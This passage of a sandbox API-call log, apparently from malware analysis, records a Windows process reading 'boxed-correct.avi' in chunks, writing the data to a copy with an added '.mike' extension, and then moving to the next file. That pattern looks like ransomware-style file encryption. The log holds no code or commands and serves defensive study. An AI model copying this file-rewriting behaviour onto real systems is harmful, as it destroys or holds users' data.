lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.365] GetFileType (hFile=0x264) returned 0x1 [0044.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.365] GetFileType (hFile=0x264) returned 0x1 [0044.365] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0044.365] WriteFile (in: hFile=0x264, lpBuffer=0x20f65b4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x20f65b4*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.365] CloseHandle (hObject=0x264) returned 1 [0044.367] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.367] GetFileType (hFile=0x264) returned 0x1 [0044.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.367] GetFileType (hFile=0x264) returned 0x1 [0044.367] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0044.367] ReadFile (in: hFile=0x264, lpBuffer=0x20f9034, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x20f9034*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.367] CloseHandle (hObject=0x264) returned 1 [0044.368] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.368] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.368] GetFileType (hFile=0x264) returned 0x1 [0044.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.368] GetFileType (hFile=0x264) returned 0x1 [0044.368] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0044.368] WriteFile (in: hFile=0x264, lpBuffer=0x210359c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x210359c*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.368] CloseHandle (hObject=0x264) returned 1 [0044.369] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.370] GetFileType (hFile=0x264) returned 0x1 [0044.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.370] GetFileType (hFile=0x264) returned 0x1 [0044.370] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0044.370] ReadFile (in: hFile=0x264, lpBuffer=0x210601c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x210601c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.370] CloseHandle (hObject=0x264) returned 1 [0044.371] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.371] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.371] GetFileType (hFile=0x264) returned 0x1 [0044.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.371] GetFileType (hFile=0x264) returned 0x1 [0044.371] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0044.371] WriteFile (in: hFile=0x264, lpBuffer=0x2110584*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2110584*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.371] CloseHandle (hObject=0x264) returned 1 [0044.372] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.372] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.372] GetFileType (hFile=0x264) returned 0x1 [0044.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.372] GetFileType (hFile=0x264) returned 0x1 [0044.372] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0044.373] ReadFile (in: hFile=0x264, lpBuffer=0x2113004, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2113004*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.373] CloseHandle (hObject=0x264) returned 1 [0044.373] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.373] GetFileType (hFile=0x264) returned 0x1 [0044.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.374] GetFileType (hFile=0x264) returned 0x1 [0044.374] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0044.374] WriteFile (in: hFile=0x264, lpBuffer=0x211d56c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x211d56c*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.374] CloseHandle (hObject=0x264) returned 1 [0044.375] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.375] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.375] GetFileType (hFile=0x264) returned 0x1 [0044.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.375] GetFileType (hFile=0x264) returned 0x1 [0044.375] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0044.375] ReadFile (in: hFile=0x264, lpBuffer=0x211ffec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x211ffec*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.375] CloseHandle (hObject=0x264) returned 1 [0044.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.376] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.376] GetFileType (hFile=0x264) returned 0x1 [0044.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.376] GetFileType (hFile=0x264) returned 0x1 [0044.376] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xf220 [0044.376] WriteFile (in: hFile=0x264, lpBuffer=0x212a554*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x212a554*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.377] CloseHandle (hObject=0x264) returned 1 [0044.378] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.378] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.378] GetFileType (hFile=0x264) returned 0x1 [0044.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.378] GetFileType (hFile=0x264) returned 0x1 [0044.378] SetFilePointer (in: hFile=0x264, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0044.378] ReadFile (in: hFile=0x264, lpBuffer=0x212cfd4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x212cfd4*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.378] CloseHandle (hObject=0x264) returned 1 [0044.379] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.379] GetFileType (hFile=0x264) returned 0x1 [0044.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.379] GetFileType (hFile=0x264) returned 0x1 [0044.379] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x11a20 [0044.379] WriteFile (in: hFile=0x264, lpBuffer=0x213753c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x213753c*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.379] CloseHandle (hObject=0x264) returned 1 [0044.380] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.380] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.381] GetFileType (hFile=0x264) returned 0x1 [0044.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.381] GetFileType (hFile=0x264) returned 0x1 [0044.381] SetFilePointer (in: hFile=0x264, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0044.381] ReadFile (in: hFile=0x264, lpBuffer=0x2139fbc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2139fbc*, lpNumberOfBytesRead=0x2af080*=0x1e00, lpOverlapped=0x0) returned 1 [0044.381] CloseHandle (hObject=0x264) returned 1 [0044.381] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.382] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.382] GetFileType (hFile=0x264) returned 0x1 [0044.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.382] GetFileType (hFile=0x264) returned 0x1 [0044.382] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x14220 [0044.382] WriteFile (in: hFile=0x264, lpBuffer=0x2142724*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2142724*, lpNumberOfBytesWritten=0x2af094*=0x1e00, lpOverlapped=0x0) returned 1 [0044.382] CloseHandle (hObject=0x264) returned 1 [0044.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0044.383] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.383] GetFileType (hFile=0x264) returned 0x1 [0044.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0044.383] GetFileType (hFile=0x264) returned 0x1 [0044.390] WriteFile (in: hFile=0x264, lpBuffer=0x21468a4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21468a4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0044.390] CloseHandle (hObject=0x264) returned 1 [0044.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.391] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4a2a3c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4a2a3c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4a9c7e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x16020)) returned 1 [0044.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.392] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2148024 | out: lpFileInformation=0x2148024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4a2a3c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4a2a3c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4a9c7e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x16020)) returned 1 [0044.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.392] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", dwFileAttributes=0x80) returned 0 [0044.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0044.393] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4a2a3c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4a2a3c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4a9c7e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x16020)) returned 1 [0044.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0044.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.393] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.393] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike")) returned 1 [0044.395] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.395] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpFilePart=0x0) returned 0x49 [0044.395] GetFullPathNameW 